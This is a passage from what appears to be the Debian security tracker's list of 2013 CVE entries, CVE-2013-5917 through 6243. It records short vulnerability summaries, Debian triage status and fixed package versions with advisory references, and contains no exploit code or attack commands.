CVE-2013-6228 RESERVED CVE-2013-6227 (Unrestricted file upload vulnerability in plugins/editor.zoho/agent/sa ...) NOT-FOR-US: Zoho plugin in Pydio (AjaXplorer) CVE-2013-6226 (Directory traversal vulnerability in plugins/editor.zoho/agent/save_zo ...) NOT-FOR-US: Pydio (AjaXplorer) Zoho Editor plugin CVE-2013-6225 (LiveZilla 5.0.1.4 has a Remote Code Execution vulnerability ...) NOT-FOR-US: LiveZilla CVE-2013-6224 (Multiple cross-site scripting (XSS) vulnerabilities in LiveZilla befor ...) NOT-FOR-US: Livezilla CVE-2013-6223 (LiveZilla before 5.1.1.0 stores the admin Base64 encoded username and ...) NOT-FOR-US: Livezilla CVE-2013-6222 (Cross-site scripting (XSS) vulnerability in the Mobility Web Client an ...) NOT-FOR-US: HP Service Manager CVE-2013-6221 (Directory traversal vulnerability in CommunicationServlet in HP Servic ...) NOT-FOR-US: HP Service Virtualization CVE-2013-6220 (Cross-site scripting (XSS) vulnerability in HP Network Node Manager i ...) NOT-FOR-US: HP CVE-2013-6219 (Unspecified vulnerability in HP HP-UX Whitelisting (aka WLI) before A. ...) NOT-FOR-US: HP-UX CVE-2013-6218 (Unspecified vulnerability in HP Network Node Manager i (NNMi) 9.0x, 9. ...) NOT-FOR-US: HP CVE-2013-6217 REJECTED CVE-2013-6216 (Unspecified vulnerability in HP Array Configuration Utility, Array Dia ...) NOT-FOR-US: HP CVE-2013-6215 (Unspecified vulnerability in the Integration Service in HP Universal C ...) NOT-FOR-US: HP Universal Configuration Management Database Integration Service CVE-2013-6214 (Unspecified vulnerability in the Integration Service in HP Universal C ...) NOT-FOR-US: HP CVE-2013-6213 (Unspecified vulnerability in Virtual User Generator in HP LoadRunner b ...) NOT-FOR-US: HP CVE-2013-6212 (Unspecified vulnerability in HP Database and Middleware Automation 10. ...) NOT-FOR-US: HP CVE-2013-6211 (Unspecified vulnerability in HP StoreOnce Virtual Storage Appliance (V ...) NOT-FOR-US: HP StoreOnce CVE-2013-6210 (Unspecified vulnerability in HP Unified Functional Testing before 12.0 ...) NOT-FOR-US: HP Unified Functional Testing CVE-2013-6209 (Unspecified vulnerability in rpc.lockd in the NFS subsystem in HP HP-U ...) NOT-FOR-US: NFS subsystem in HP HP-UX CVE-2013-6208 (Unspecified vulnerability in HP Smart Update Manager 5.3.5 before buil ...) NOT-FOR-US: HP Smart Update Manager CVE-2013-6207 (Unspecified vulnerability in the loadFileContents function in the SOAP ...) NOT-FOR-US: HP SiteScope CVE-2013-6206 (Unspecified vulnerability in HP Rapid Deployment Pack (RDP) and Insigh ...) NOT-FOR-US: HP CVE-2013-6205 (Unspecified vulnerability in HP Rapid Deployment Pack (RDP) and Insigh ...) NOT-FOR-US: HP CVE-2013-6204 (The Web Console in HP Application Information Optimizer (formerly HP D ...) NOT-FOR-US: HP Application Information Optimizer CVE-2013-6203 (The Web Console in HP Application Information Optimizer (formerly HP D ...) NOT-FOR-US: HP Application Information Optimizer CVE-2013-6202 (Multiple cross-site request forgery (CSRF) vulnerabilities in HP Servi ...) NOT-FOR-US: HP Service Manager CVE-2013-6201 (Unspecified vulnerability in HP Security Management System 3.3.0, 3.5. ...) NOT-FOR-US: HP Security Management System CVE-2013-6200 (Unspecified vulnerability in m4 in HP HP-UX B.11.23 and B.11.31 allows ...) NOT-FOR-US: HP-UX CVE-2013-6199 REJECTED CVE-2013-6198 (Cross-site scripting (XSS) vulnerability in HP Service Manager WebTier ...) NOT-FOR-US: HP Service Manager WebTier and Windows Client CVE-2013-6197 (Unspecified vulnerability in HP Service Manager WebTier and Windows Cl ...) NOT-FOR-US: HP Service Manager WebTier and Windows Client CVE-2013-6196 (Cross-site scripting (XSS) vulnerability in HP Autonomy Ultraseek 5 al ...) NOT-FOR-US: HP Autonomy Ultraseek CVE-2013-6195 (Unspecified vulnerability in HP Storage Data Protector 6.2X allows rem ...) NOT-FOR-US: HP Data Protector CVE-2013-6194 (Unspecified vulnerability in HP Storage Data Protector 6.2X allows rem ...) NOT-FOR-US: HP Data Protector CVE-2013-6193 (Unspecified vulnerability on HP LaserJet M1522n and M2727; LaserJet Pr ...) NOT-FOR-US: HP Printers CVE-2013-6192 (Cross-site request forgery (CSRF) vulnerability in HP Operations Orche ...) NOT-FOR-US: HP Operations Orchestration CVE-2013-6191 (Cross-site scripting (XSS) vulnerability in HP Operations Orchestratio ...) NOT-FOR-US: HP Operations Orchestration CVE-2013-6190 REJECTED CVE-2013-6189 (Unspecified vulnerability in the Archive Query Server in HP Applicatio ...) NOT-FOR-US: HP Application Information Optimizer CVE-2013-6188 (Cross-site request forgery (CSRF) vulnerability in HP System Managemen ...) NOT-FOR-US: HP System Management Homepage CVE-2013-6187 REJECTED CVE-2013-6186 REJECTED CVE-2013-6185 REJECTED CVE-2013-6184 REJECTED CVE-2013-6183 REJECTED CVE-2013-6182 (Unquoted Windows search path vulnerability in EMC Replication Manager ...) NOT-FOR-US: EMC Replication Manager CVE-2013-6181 (EMC Watch4Net before 6.3 stores cleartext polled-device passwords in t ...) NOT-FOR-US: EMC Watch4net CVE-2013-6180 (EMC RSA Security Analytics (SA) 10.x before 10.3, and RSA NetWitness N ...) NOT-FOR-US: RSA Security Analytics CVE-2013-6179 REJECTED CVE-2013-6178 (Multiple cross-site scripting (XSS) vulnerabilities in EMC RSA Archer ...) NOT-FOR-US: EMC RSA Archer GRC CVE-2013-6177 (Directory traversal vulnerability in EMC Document Sciences xPression 4 ...) NOT-FOR-US: EMC CVE-2013-6176 (Multiple SQL injection vulnerabilities in EMC Document Sciences xPress ...) NOT-FOR-US: EMC CVE-2013-6175 (Multiple cross-site scripting (XSS) vulnerabilities in EMC Document Sc ...) NOT-FOR-US: EMC CVE-2013-6174 (Multiple open redirect vulnerabilities in xAdmin in EMC Document Scien ...) NOT-FOR-US: EMC CVE-2013-6173 (Multiple cross-site request forgery (CSRF) vulnerabilities in EMC Docu ...) NOT-FOR-US: EMC CVE-2013-6172 (steps/utils/save_pref.inc in Roundcube webmail before 0.8.7 and 0.9.x ...) {DSA-2787-1} - roundcube 0.9.4-1.1 (bug #727668) [squeeze] - roundcube (Vulnerable code not present) NOTE: http://web.archive.org/web/20160304042345/http://roundcube.net/news/2013/10/21/security-updates-095-and-087/ NOTE: http://trac.roundcube.net/ticket/1489382 CVE-2013-6171 (checkpassword-reply in Dovecot before 2.2.7 performs setuid operations ...) - dovecot 1:2.2.9-1 (low; bug #729063) [wheezy] - dovecot (Minor issue) [squeeze] - dovecot (Minor issue) CVE-2013-6170 (Juniper Junos 10.0 before 10.0S28, 10.4 before 10.4R7, 11.1 before 11. ...) NOT-FOR-US: Juniper Junos CVE-2013-6169 (The TLS driver in ejabberd before 2.1.12 supports (1) SSLv2 and (2) we ...) {DSA-2775-1} - ejabberd 2.1.11-1 (bug #722105) CVE-2013-6168 (Cross-site scripting (XSS) vulnerability in Zikula Application Framewo ...) NOT-FOR-US: Zikula CVE-2013-6165 RESERVED CVE-2013-6164 (SQL injection vulnerability in view/objectDetail.php in Project'Or RIA ...) NOT-FOR-US: Project'Or RIA CVE-2013-6163 (Multiple cross-site scripting (XSS) vulnerabilities in ProjeQtOr (form ...) NOT-FOR-US: Project'Or RIA CVE-2013-6162 (Cross-site scripting (XSS) vulnerability in Code-Crafters Ability Mail ...) NOT-FOR-US: Code-Crafters Ability Mail Server CVE-2013-6161 REJECTED CVE-2013-6160 REJECTED CVE-2013-6159 REJECTED CVE-2013-6158 REJECTED CVE-2013-6157 REJECTED CVE-2013-6156 REJECTED CVE-2013-6155 REJECTED CVE-2013-6154 REJECTED CVE-2013-6153 REJECTED CVE-2013-6152 REJECTED CVE-2013-6151 REJECTED CVE-2013-6150 REJECTED CVE-2013-6149 REJECTED CVE-2013-6148 REJECTED CVE-2013-6147 REJECTED CVE-2013-6146 REJECTED CVE-2013-6145 REJECTED CVE-2013-6144 REJECTED CVE-2013-6143 (The Schneider Electric Telvent SAGE 3030 RTU with firmware C3413-500-0 ...) NOT-FOR-US: Schneider Electric Telvent SAGE 3030 RTU CVE-2013-6142 (DNP3Driver.exe in the DNP3 driver in Schneider Electric ClearSCADA 201 ...) NOT-FOR-US: Schneider Electric ClearSCADA CVE-2013-6141 (Unspecified vulnerability in op5 Monitor before 6.1.3 allows attackers ...) NOT-FOR-US: op5 CVE-2013-6140 RESERVED CVE-2013-6139 RESERVED CVE-2013-6138 RESERVED CVE-2013-6137 RESERVED CVE-2013-6136 RESERVED CVE-2013-6135 RESERVED CVE-2013-6134 RESERVED CVE-2013-6133 RESERVED CVE-2013-6132 RESERVED CVE-2013-6131 RESERVED CVE-2013-6130 RESERVED CVE-2013-6128 (The KCHARTXYLib.KChartXY ActiveX control in KChartXY.ocx before 65.30. ...) NOT-FOR-US: WellinTech KingView CVE-2013-6127 (The SUPERGRIDLib.SuperGrid ActiveX control in SuperGrid.ocx before 65. ...) NOT-FOR-US: WellinTech KingView CVE-2013-6126 REJECTED CVE-2013-6125 REJECTED CVE-2013-6124 (The Qualcomm Innovation Center (QuIC) init scripts in Code Aurora Foru ...) NOT-FOR-US: Qualcomm (Android) CVE-2013-6123 (Multiple array index errors in drivers/media/video/msm/server/msm_cam_ ...) NOT-FOR-US: Android Linux kernel CVE-2013-6122 (goodix_tool.c in the Goodix gt915 touchscreen driver for the Linux ker ...) NOT-FOR-US: Goodix gt915 Android touchscreen driver CVE-2013-6121 RESERVED CVE-2013-6120 RESERVED CVE-2013-6119 RESERVED CVE-2013-6118 RESERVED CVE-2013-6117 (Dahua DVR 2.608.0000.0 and 2.608.GV00.0 allows remote attackers to byp ...) NOT-FOR-US: Dahua DVR CVE-2013-6116 RESERVED CVE-2013-6115 RESERVED CVE-2013-6114 (Integer overflow in the OZDocument::parseElement function in Apple Mot ...) NOT-FOR-US: Apple Motion CVE-2013-6113 RESERVED CVE-2013-6112 RESERVED CVE-2013-6111 (Cross-site scripting (XSS) vulnerability in the mod_pagespeed module 0 ...) NOT-FOR-US: mod_pagespeed CVE-2013-6110 RESERVED CVE-2013-6109 RESERVED CVE-2013-6108 RESERVED CVE-2013-6107 RESERVED CVE-2013-6106 RESERVED CVE-2013-6105 RESERVED CVE-2013-6104 REJECTED CVE-2013-6103 REJECTED CVE-2013-6102 REJECTED CVE-2013-6101 REJECTED CVE-2013-6100 REJECTED CVE-2013-6099 REJECTED CVE-2013-6098 REJECTED CVE-2013-6097 REJECTED CVE-2013-6096 REJECTED CVE-2013-6095 REJECTED CVE-2013-6094 REJECTED CVE-2013-6093 REJECTED CVE-2013-6092 REJECTED CVE-2013-6091 REJECTED CVE-2013-6090 REJECTED CVE-2013-6089 REJECTED CVE-2013-6088 REJECTED CVE-2013-6087 REJECTED CVE-2013-6086 REJECTED CVE-2013-6085 REJECTED CVE-2013-6084 REJECTED CVE-2013-6083 REJECTED CVE-2013-6082 REJECTED CVE-2013-6081 REJECTED CVE-2013-6080 REJECTED CVE-2013-6079 (Buffer overflow in MostGear Soft Easy LAN Folder Share 3.2.0.100 allow ...) NOT-FOR-US: MostGear Soft Easy LAN Folder Share CVE-2013-6078 (The default configuration of EMC RSA BSAFE Toolkits and RSA Data Prote ...) NOT-FOR-US: EMC RSA CVE-2013-6077 (Citrix XenDesktop 7.0, when upgraded from XenDesktop 5.x, does not pro ...) NOT-FOR-US: Citrix XenDesktop CVE-2013-6076 (strongSwan 5.0.2 through 5.1.0 allows remote attackers to cause a deni ...) - strongswan 5.1.0-3 [squeeze] - strongswan (Vulnerable Code not present, introduced by upstream commit 30216000d3752026127c2f91470ce165ab3d3926) [wheezy] - strongswan (Vulnerable Code not present, introduced by upstream commit 30216000d3752026127c2f91470ce165ab3d3926) CVE-2013-6075 (The compare_dn function in utils/identification.c in strongSwan 4.3.3 ...) {DSA-2789-1} - strongswan 5.1.0-3 CVE-2013-6074 (Cross-site scripting (XSS) vulnerability in Open-Xchange (OX) AppSuite ...) NOT-FOR-US: Open-Xchange CVE-2013-6073 RESERVED CVE-2013-6072 RESERVED CVE-2013-6071 RESERVED CVE-2013-6070 RESERVED CVE-2013-6069 RESERVED CVE-2013-6068 RESERVED CVE-2013-6067 RESERVED CVE-2013-6066 RESERVED CVE-2013-6065 RESERVED CVE-2013-6064 RESERVED CVE-2013-6243 (SQL injection vulnerability in the Landing Pages plugin 1.2.3, before ...) NOT-FOR-US: WordPress Landing Pages Plugin CVE-2013-6167 (Mozilla Firefox through 27 sends HTTP Cookie headers without first val ...) - iceweasel (unimportant) NOTE: https://bugzilla.mozilla.org/show_bug.cgi?id=858215 CVE-2013-6166 (Google Chrome before 29 sends HTTP Cookie headers without first valida ...) - chromium-browser 31.0.1650.57-1 (low) [squeeze] - chromium-browser NOTE: https://code.google.com/p/chromium/issues/detail?id=238041 CVE-2013-6129 (The install/upgrade.php scripts in vBulletin 4.1 and 5 allow remote at ...) NOT-FOR-US: VBulletin CVE-2013-6063 RESERVED CVE-2013-6062 RESERVED CVE-2013-6061 RESERVED CVE-2013-6060 RESERVED CVE-2013-6059 RESERVED CVE-2013-6058 (SQL injection vulnerability in appRain CMF 3.0.2 and earlier allows re ...) NOT-FOR-US: appRain CMS CVE-2013-6057 RESERVED CVE-2013-6056 (OSSIM before 4.3.3.1 has tele_compress.php path traversal vulnerabilit ...) NOT-FOR-US: AlienVault OSSIM CVE-2013-6055 REJECTED CVE-2013-6054 (Heap-based buffer overflow in OpenJPEG 1.3 has unspecified impact and ...) {DSA-2808-1} - openjpeg 1.3+dfsg-4.7 (bug #731237) CVE-2013-6053 (OpenJPEG 1.5.1 allows remote attackers to obtain sensitive information ...) - openjpeg 1.5.2-1 (bug #731237) [wheezy] - openjpeg (Only affects 1.5) [squeeze] - openjpeg (Only affects 1.5) CVE-2013-6052 (OpenJPEG 1.3 and earlier allows remote attackers to obtain sensitive i ...) {DSA-2808-1} - openjpeg 1.3+dfsg-4.7 (bug #731237) CVE-2013-6051 (The bgp_attr_unknown function in bgp_attr.c in Quagga 0.99.21 does not ...) {DSA-2803-1} - quagga 0.99.22.4-1 (bug #730513) [squeeze] - quagga (Only affects 0.99.21) CVE-2013-6050 (Integer overflow in Links before 2.8 allows remote attackers to cause ...) {DSA-2807-1} - links2 2.8-1 CVE-2013-6049 (apt-listbugs before 0.1.10 creates temporary files insecurely, which a ...) - apt-listbugs 0.1.10 (low) [squeeze] - apt-listbugs (Minor issue) [wheezy] - apt-listbugs 0.1.8+deb7u1 CVE-2013-6048 (The get_group_tree function in lib/Munin/Master/HTMLConfig.pm in Munin ...) {DSA-2815-1 DLA-20-1} - munin 2.0.18-1 [squeeze] - munin 1.4.5-3+deb6u1 CVE-2013-6047 (Multiple cross-site scripting (XSS) vulnerabilities in the site creati ...) - ikiwiki-hosting 0.20131025 [wheezy] - ikiwiki-hosting (Minor XSS) CVE-2013-6046 RESERVED CVE-2013-6045 (Multiple heap-based buffer overflows in OpenJPEG 1.3 and earlier might ...) {DSA-2808-1} - openjpeg 1.3+dfsg-4.7 (bug #731237) CVE-2013-6044 (The is_safe_url function in utils/http.py in Django 1.4.x before 1.4.6 ...) {DSA-2740-1} - python-django 1.5.2-1 CVE-2013-6043 (The login function in Softaculous Webuzo before 2.1.4 provides differe ...) NOT-FOR-US: Softaculous Webuzo CVE-2013-6042 (Cross-site scripting (XSS) vulnerability in filemanager/login.php in t ...) NOT-FOR-US: Softaculous Webuzo CVE-2013-6041 (index.php in Softaculous Webuzo before 2.1.4 allows remote attackers t ...) NOT-FOR-US: Softaculous Webuzo CVE-2013-6040 (Multiple unspecified vulnerabilities in the MW6 Aztec, DataMatrix, and ...) NOT-FOR-US: MW6 Technologies CVE-2013-6039 (Multiple cross-site scripting (XSS) vulnerabilities in NagiosQL 3.2 SP ...) NOT-FOR-US: NagiosQL CVE-2013-6038 (Stack-based buffer overflow in Trimble SketchUp Viewer 13.0.4124 allow ...) NOT-FOR-US: Trimble SketchUp Viewer CVE-2013-6037 (Cross-site scripting (XSS) vulnerability in index.php in Aker Secure M ...) NOT-FOR-US: Aker Secure Mail Gateway CVE-2013-6036 RESERVED CVE-2013-6035 (The firmware on GateHouse; Harris BGAN RF-7800B-VU204 and BGAN RF-7800 ...) NOT-FOR-US: Inmarsat broadband satellite terminals CVE-2013-6034 (The firmware on GateHouse; Harris BGAN RF-7800B-VU204 and BGAN RF-7800 ...) NOT-FOR-US: Inmarsat broadband satellite terminals CVE-2013-6033 (Multiple cross-site scripting (XSS) vulnerabilities on Lexmark W840 th ...) NOT-FOR-US: Lexmark CVE-2013-6032 (cgi-bin/postpf/cgi-bin/dynamic/config/config.html on Lexmark X94x befo ...) NOT-FOR-US: Lexmark CVE-2013-6031 (The Huawei E355 adapter with firmware 21.157.37.01.910 does not requir ...) NOT-FOR-US: Huawei E355 adapter CVE-2013-6030 (Directory traversal vulnerability on the Emerson Network Power Avocent ...) NOT-FOR-US: Emerson Network Power CVE-2013-6029 (Stack-based buffer overflow in the AT&T Connect Participant Applic ...) NOT-FOR-US: AT&T Connect Participant Application CVE-2013-6028 (Multiple cross-site request forgery (CSRF) vulnerabilities in Atmail W ...) NOT-FOR-US: Atmail Webmail Server CVE-2013-6027 (Stack-based buffer overflow in the RuntimeDiagnosticPing function in / ...) NOT-FOR-US: D-Link CVE-2013-6026 (The web interface on D-Link DIR-100, DIR-120, DI-624S, DI-524UP, DI-60 ...) NOT-FOR-US: D-Link CVE-2013-6025 (The XMLParse procedure in SAP Sybase Adaptive Server Enterprise (ASE) ...) NOT-FOR-US: SAP Sybase Adaptive Server Enterprise CVE-2013-6024 (The Edge Client components in F5 BIG-IP APM 10.x, 11.x, 12.x, 13.x, an ...) NOT-FOR-US: F5 BIG-IP CVE-2013-6023 (Directory traversal vulnerability in the TVT TD-2308SS-B DVR with firm ...) NOT-FOR-US: TVT TD-2308SS-B DVR CVE-2013-6022 (A Cross-Site Scripting (XSS) vulnerability exists in Tiki Wiki CMG Gro ...) - tikiwiki CVE-2013-6021 (Buffer overflow in WGagent in WatchGuard WSM and Fireware before 11.8 ...) NOT-FOR-US: WatchGuard WSM and Fireware CVE-2013-6020 (passwordRequestPOST.jsp in Tyler Technologies TaxWeb 3.13.3.1 sends di ...) NOT-FOR-US: Tyler Technologies TaxWeb CVE-2013-6019 (Cross-site scripting (XSS) vulnerability in Tyler Technologies TaxWeb ...) NOT-FOR-US: Tyler Technologies TaxWeb CVE-2013-6018 (Cross-site request forgery (CSRF) vulnerability in login.jsp in Tyler ...) NOT-FOR-US: Tyler Technologies TaxWeb CVE-2013-6017 (Cross-site scripting (XSS) vulnerability in Atmail Webmail Server befo ...) NOT-FOR-US: Atmail Webmail Server CVE-2013-6016 (The Traffic Management Microkernel (TMM) in F5 BIG-IP LTM, APM, ASM, E ...) NOT-FOR-US: F5 CVE-2013-6015 (Juniper Junos before 10.4S14, 11.4 before 11.4R5-S2, 12.1R before 12.1 ...) NOT-FOR-US: Juniper Junos CVE-2013-6014 (Juniper Junos 10.4 before 10.4S15, 11.4 before 11.4R9, 11.4X27 before ...) NOT-FOR-US: Juniper Junos CVE-2013-6013 (Buffer overflow in the flow daemon (flowd) in Juniper Junos 10.4 befor ...) NOT-FOR-US: Juniper Junos CVE-2013-6012 (Juniper Junos 12.1X44 before 12.1.X44-D20 and 12.1X45 before 12.1X45-D ...) NOT-FOR-US: Juniper Junos CVE-2013-6011 (Citrix NetScaler Application Delivery Controller (ADC) 10.0 before 10. ...) NOT-FOR-US: Citrix NetScaler Application Delivery Controller CVE-2013-6010 (Cross-site scripting (XSS) vulnerability in the Comment Attachment plu ...) NOT-FOR-US: Wordpress Comment-Attachment plugin CVE-2013-6009 (CRLF injection vulnerability in Open-Xchange AppSuite before 7.2.2, wh ...) NOT-FOR-US: Open-Xchange CVE-2013-6008 REJECTED CVE-2013-6007 REJECTED CVE-2013-6006 (Cybozu Garoon 3.5 through 3.7 SP2 allows remote attackers to bypass Ke ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6005 (Cross-site scripting (XSS) vulnerability in Cybozu Dezie before 8.1.0 ...) NOT-FOR-US: Cybozu Dezie CVE-2013-6004 (Session fixation vulnerability in Cybozu Garoon before 3.7.2 allows re ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6003 (CRLF injection vulnerability in Cybozu Garoon 3.1 through 3.5 SP5, whe ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6002 (The server in Cybozu Garoon before 3.7 SP1 allows remote attackers to ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6001 (SQL injection vulnerability in the Space function in Cybozu Garoon bef ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6000 (Directory traversal vulnerability in Tattyan HP TOWN before 5_10_1 all ...) NOT-FOR-US: Tattyan HP TOWN CVE-2013-5999 (Kingsoft KDrive Personal before 1.21.0.1880 on Windows does not verify ...) NOT-FOR-US: Kingsoft KDrive Personal CVE-2013-5998 (Unspecified vulnerability in the Web manager implementation on D-Link ...) NOT-FOR-US: D-Link CVE-2013-5997 (Unspecified vulnerability in the SSH implementation on D-Link Japan DE ...) NOT-FOR-US: D-Link CVE-2013-5996 (Multiple cross-site scripting (XSS) vulnerabilities in shopping/paymen ...) NOT-FOR-US: LOCKON EC-CUBE CVE-2013-5995 (data/class/helper/SC_Helper_Address.php in the front-features implemen ...) NOT-FOR-US: LOCKON EC-CUBE CVE-2013-5994 (data/class/pages/mypage/LC_Page_Mypage_DeliveryAddr.php in LOCKON EC-C ...) NOT-FOR-US: LOCKON EC-CUBE CVE-2013-5993 (Cross-site request forgery (CSRF) vulnerability in LOCKON EC-CUBE 2.11 ...) NOT-FOR-US: LOCKON EC-CUBE CVE-2013-5992 (Cross-site scripting (XSS) vulnerability in the displaySystemError fun ...) NOT-FOR-US: LOCKON EC-CUBE CVE-2013-5991 (The displaySystemError function in html/handle_error.php in LOCKON EC- ...) NOT-FOR-US: LOCKON EC-CUBE CVE-2013-5990 (Unspecified vulnerability in JustSystems Ichitaro 2006 through 2011; I ...) NOT-FOR-US: JustSystems Ichitaro CVE-2013-5989 REJECTED CVE-2013-5988 (A Cross-site Scripting (XSS) vulnerability exists in the All in One SE ...) NOT-FOR-US: All in One SEO Pack plugin for WordPress CVE-2013-5987 (Unspecified vulnerability in NVIDIA graphics driver Release 331, 325, ...) - nvidia-graphics-drivers 304.117-1 (bug #735271) [squeeze] - nvidia-graphics-drivers (Non-free not supported) NOTE: http://nvidia.custhelp.com/app/answers/detail/a_id/3377 CVE-2013-5986 (Unspecified vulnerability in NVIDIA graphics driver Release 331, 325, ...) - nvidia-graphics-drivers 304.117-1 (bug #735271) [squeeze] - nvidia-graphics-drivers (Non-free not supported) NOTE: http://nvidia.custhelp.com/app/answers/detail/a_id/3377 CVE-2013-5985 RESERVED CVE-2013-5984 (Directory traversal vulnerability in userfiles/modules/admin/backup/de ...) NOT-FOR-US: Microweber CVE-2013-5983 (Multiple cross-site scripting (XSS) vulnerabilities in GuppY before 4. ...) NOT-FOR-US: GuppY CVE-2013-5982 RESERVED CVE-2013-5981 RESERVED CVE-2013-5980 RESERVED CVE-2013-5979 (Directory traversal vulnerability in Spring Signage Xibo 1.2.x before ...) NOT-FOR-US: Xibo CVE-2013-5978 (Multiple cross-site scripting (XSS) vulnerabilities in products.php in ...) NOT-FOR-US: Cart66 Lite plugin for WordPress CVE-2013-5977 (Cross-site request forgery (CSRF) vulnerability in Cart66Product.php i ...) NOT-FOR-US: Cart66 Lite plugin for WordPress CVE-2013-5976 (Cross-site scripting (XSS) vulnerability in the access policy logout p ...) NOT-FOR-US: F5 BIG-IP APM CVE-2013-5975 (The access policy logon page (logon.inc) in F5 BIG-IP APM 11.1.0 throu ...) NOT-FOR-US: F5 BIG-IP APM CVE-2013-5974 REJECTED CVE-2013-5973 (VMware ESXi 4.0 through 5.5 and ESX 4.0 and 4.1 allow local users to r ...) NOT-FOR-US: VMware ESXi and ESX CVE-2013-5972 (VMware Workstation 9.x before 9.0.3 and VMware Player 5.x before 5.0.3 ...) NOT-FOR-US: VMware CVE-2013-5971 (Session fixation vulnerability in the vSphere Web Client Server in VMw ...) NOT-FOR-US: VMware vSphere CVE-2013-5970 (hostd-vmdb in VMware ESXi 4.0 through 5.0 and ESX 4.0 through 4.1 allo ...) NOT-FOR-US: VMware ESXi and ESX CVE-2013-5969 RESERVED CVE-2013-5968 (Cross-site scripting (XSS) vulnerability in CA SiteMinder 12.0 through ...) NOT-FOR-US: CA SiteMinder CVE-2013-5967 (Multiple SQL injection vulnerabilities in AlienVault Open Source Secur ...) NOT-FOR-US: AlienVault Open Source Security Information Management CVE-2013-5966 (Cross-site scripting (XSS) vulnerability in ZK Framework before 5.0.13 ...) NOT-FOR-US: ZK Framework CVE-2013-5965 (The Node View Permissions module 7.x-1.x before 7.x-1.2 for Drupal doe ...) NOT-FOR-US: Drupal addon CVE-2013-5964 (Cross-site scripting (XSS) vulnerability in the administration page in ...) NOT-FOR-US: Drupal addon CVE-2013-5963 (Unrestricted file upload vulnerability in multi.php in Simple Dropbox ...) NOT-FOR-US: WordPress plugin Simple Dropbox Upload CVE-2013-5962 (Unrestricted file upload vulnerability in frames/upload-images.php in ...) NOT-FOR-US: Complete Gallery Manager plugin for Wordpress CVE-2013-5961 (Unrestricted file upload vulnerability in lazyseo.php in the Lazy SEO ...) NOT-FOR-US: WordPress plugin Lazy SEO CVE-2013-5960 (The authenticated-encryption feature in the symmetric-encryption imple ...) NOT-FOR-US: OWASP Enterprise Security API for Java CVE-2013-5958 (The Security component in Symfony 2.0.x before 2.0.25, 2.1.x before 2. ...) - symfony (Fixed before initial upload) CVE-2013-5957 (Multiple SQL injection vulnerabilities in CRM/Core/Page/AJAX/Location. ...) - civicrm (Fixed before initial upload to the archive) CVE-2013-5956 (Cross-site scripting (XSS) vulnerability in includes/flvthumbnail.php ...) NOT-FOR-US: Joomla plugin CVE-2013-5955 (Cross-site scripting (XSS) vulnerability in manage.php in the PBBookin ...) NOT-FOR-US: Joomla plugin CVE-2013-5954 (Multiple cross-site request forgery (CSRF) vulnerabilities in OpenX 2. ...) NOT-FOR-US: OpenX CVE-2013-5953 (Multiple cross-site scripting (XSS) vulnerabilities in tmpl/layout_edi ...) NOT-FOR-US: Joomla component multi calendar CVE-2013-5952 (Multiple cross-site scripting (XSS) vulnerabilities in the Freichat (c ...) NOT-FOR-US: Joomla component Freichat CVE-2013-5951 (Multiple cross-site scripting (XSS) vulnerabilities in eXtplorer 2.1.3 ...) {DSA-2882-1} - extplorer (bug #741908) NOTE: http://seclists.org/fulldisclosure/2014/Mar/273 CVE-2013-5950 RESERVED CVE-2013-5949 RESERVED CVE-2013-5948 (The Network Analysis tab (Main_Analysis_Content.asp) in the ASUS RT-AC ...) NOT-FOR-US: ASUS router CVE-2013-5947 RESERVED CVE-2013-5946 (The runShellCmd function in systemCheck.htm in D-Link DSR-150 with fir ...) NOT-FOR-US: D-Link CVE-2013-5945 (Multiple SQL injection vulnerabilities in D-Link DSR-150 with firmware ...) NOT-FOR-US: D-Link CVE-2013-5944 (The integrated web server on Siemens SCALANCE X-200 switches with firm ...) NOT-FOR-US: web server on Siemens switches CVE-2013-5959 (Blue Coat ProxySG before 6.2.14.1, 6.3.x, 6.4.x, and 6.5 before 6.5.2 ...) NOT-FOR-US: Blue Coat ProxySG CVE-2013-5943 (Multiple cross-site scripting (XSS) vulnerabilities in Graphite before ...) - graphite-web 0.9.12+debian-1 CVE-2013-5942 (Graphite 0.9.5 through 0.9.10 uses the pickle Python module unsafely, ...) - graphite-web 0.9.12+debian-1 CVE-2013-5941 RESERVED CVE-2013-5940 RESERVED CVE-2013-5939 (Multiple cross-site scripting (XSS) vulnerabilities in the Guestbook m ...) NOT-FOR-US: PHPCMS CVE-2013-5938 (Cross-site scripting (XSS) vulnerability in the Click2Sell Suite modul ...) NOT-FOR-US: Click2Sell Suite Drupal contributed module CVE-2013-5937 (Cross-site request forgery (CSRF) vulnerability in the Click2Sell Suit ...) NOT-FOR-US: Click2Sell Suite Drupal contributed module CVE-2013-5936 (The Hazelcast cluster API in Open-Xchange AppSuite 7.0.x before 7.0.2- ...) NOT-FOR-US: Open-Xchange CVE-2013-5935 (The Hazelcast cluster API in Open-Xchange AppSuite 7.0.x before 7.0.2- ...) NOT-FOR-US: Open-Xchange CVE-2013-5934 (Open-Xchange AppSuite 7.0.x before 7.0.2-rev15 and 7.2.x before 7.2.2- ...) NOT-FOR-US: Open-Xchange CVE-2013-5933 (Stack-based buffer overflow in the sub_E110 function in init in a cert ...) NOT-FOR-US: Motorola CVE-2013-5932 (Unspecified vulnerability in WebAdmin in Sophos UTM (aka Astaro Securi ...) NOT-FOR-US: Sophos UTM CVE-2013-5931 (SQL injection vulnerability in property_listings_detail.php in Real Es ...) NOT-FOR-US: Real Estate PHP Script CVE-2013-5930 (Cross-site scripting (XSS) vulnerability in search_residential.php in ...) NOT-FOR-US: Real Estate PHP Script CVE-2013-5929 RESERVED CVE-2013-5928 RESERVED CVE-2013-5927 RESERVED CVE-2013-5926 RESERVED CVE-2013-5925 RESERVED CVE-2013-5924 RESERVED CVE-2013-5923 RESERVED CVE-2013-5922 RESERVED CVE-2013-5921 RESERVED CVE-2013-5920 RESERVED CVE-2013-5919 (Suricata before 1.4.6 allows remote attackers to cause a denial of ser ...) - suricata 2.0-1 (bug #751658) [wheezy] - suricata (Minor issue) [squeeze] - suricata (Minor issue) NOTE: https://github.com/OISF/suricata/commit/cd80dcbfd4616582daa39fa56960208ee8e23262 CVE-2013-5918 (Cross-site scripting (XSS) vulnerability in platinum_seo_pack.php in t ...) NOT-FOR-US: Platinum SEO plugin for WordPress CVE-2013-5917 (SQL injection vulnerability in wp-comments-post.php in the NOSpam PTI ...) NOT-FOR-US: NOSpam PTIa 